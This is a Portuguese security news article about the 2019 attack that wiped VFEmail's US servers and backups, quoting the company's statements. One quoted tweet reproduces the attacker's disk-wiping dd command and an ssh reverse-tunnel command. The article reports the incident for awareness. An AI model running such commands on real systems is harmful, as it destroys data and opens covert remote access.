Um ciberataque destrutivo atingiu o provedor de e-mail VFEmail. Um hacker eliminou os dados de um dos servidores nos Estados Unidos, incluindo os sistemas de backup.
Um adversário desconhecido lançou um ataque informático devastador contra o provedor de e-mail VFEmail.
Segundo o que foi apurado, o hacker apagou dados do servidor, incluindo backups, e 18 anos de e-mails de clientes foram perdidos.
“We have suffered catastrophic destruction at the hands of a hacker. This person has destroyed all data in the US, both primary and backup systems. We are working to recover what data we can,” reads the statementpublished by the company on its website.
At this time, the attacker has formatted all the disks on every server. Every VM is lost. Every file server is lost, every backup server is lost. NL was 100% hosted with a vastly smaller dataset. NL backups by the provideer were intact, and service should be up there.
— VFEmail.net (@VFEmail) February 11, 2019
Na segunda-feira, o provedor de e-mail confirmou que os seus sistemas, disponiveis em vários datacenters, ficaram inacessíveis depois de um incidente.
A empresa observou o hacker enquanto ele formatava um servidor de backup hospedado na Holanda.
Infelizmente, nessa altura, o hacker já havia conseguido apagar todos os discos em todos os outros servidores do VFEmail.
O hacker destruiu todas as máquinas virtuais, e ao que parece, elas não partilhavam a mesma autenticação.
“This was more than a multi-password via ssh exploit, and there was no ransom. Just attack and destroy,” VFEmail said.
Segundo a empresa, o hacker parece ter-se ligado da Bulgária.
Caught the perp in the middle of formatting the backup server:
dd if=/dev/zero of=/dev/da0 bs=4194304 seek=1024 count=399559
via: ssh -v -oStrictHostKeyChecking=no -oLogLevel=error -oUserKnownHostsFile=/dev/null [email protected] -R 127.0.0.1:30081:127.0.0.1:22 -N— VFEmail.net (@VFEmail) February 11, 2019
A equipe do VFEmail recomenda que os utilizadores não se liguem ao serviço, pois todo o conteúdo das suas contas foi apagado pelo hacker.
A boa notícia e que, os backups dos servidores localizados na Holanda não foram afetados e foram usados para restaurar todo o serviço.
Pedro Tavares is a professional in the field of information security working as an Ethical Hacker/Pentester, Malware Researcher and also a Security Evangelist. He is also a founding member at CSIRT.UBI and Editor-in-Chief of the security computer blog seguranca-informatica.pt.
In recent years he has invested in the field of information security, exploring and analyzing a wide range of topics, such as pentesting (Kali Linux), malware, exploitation, hacking, IoT and security in Active Directory networks. He is also Freelance Writer (Infosec. Resources Institute and Cyber Defense Magazine) and developer of the 0xSI_f33d – a feed that compiles phishing and malware campaigns targeting Portuguese citizens.
Read more here.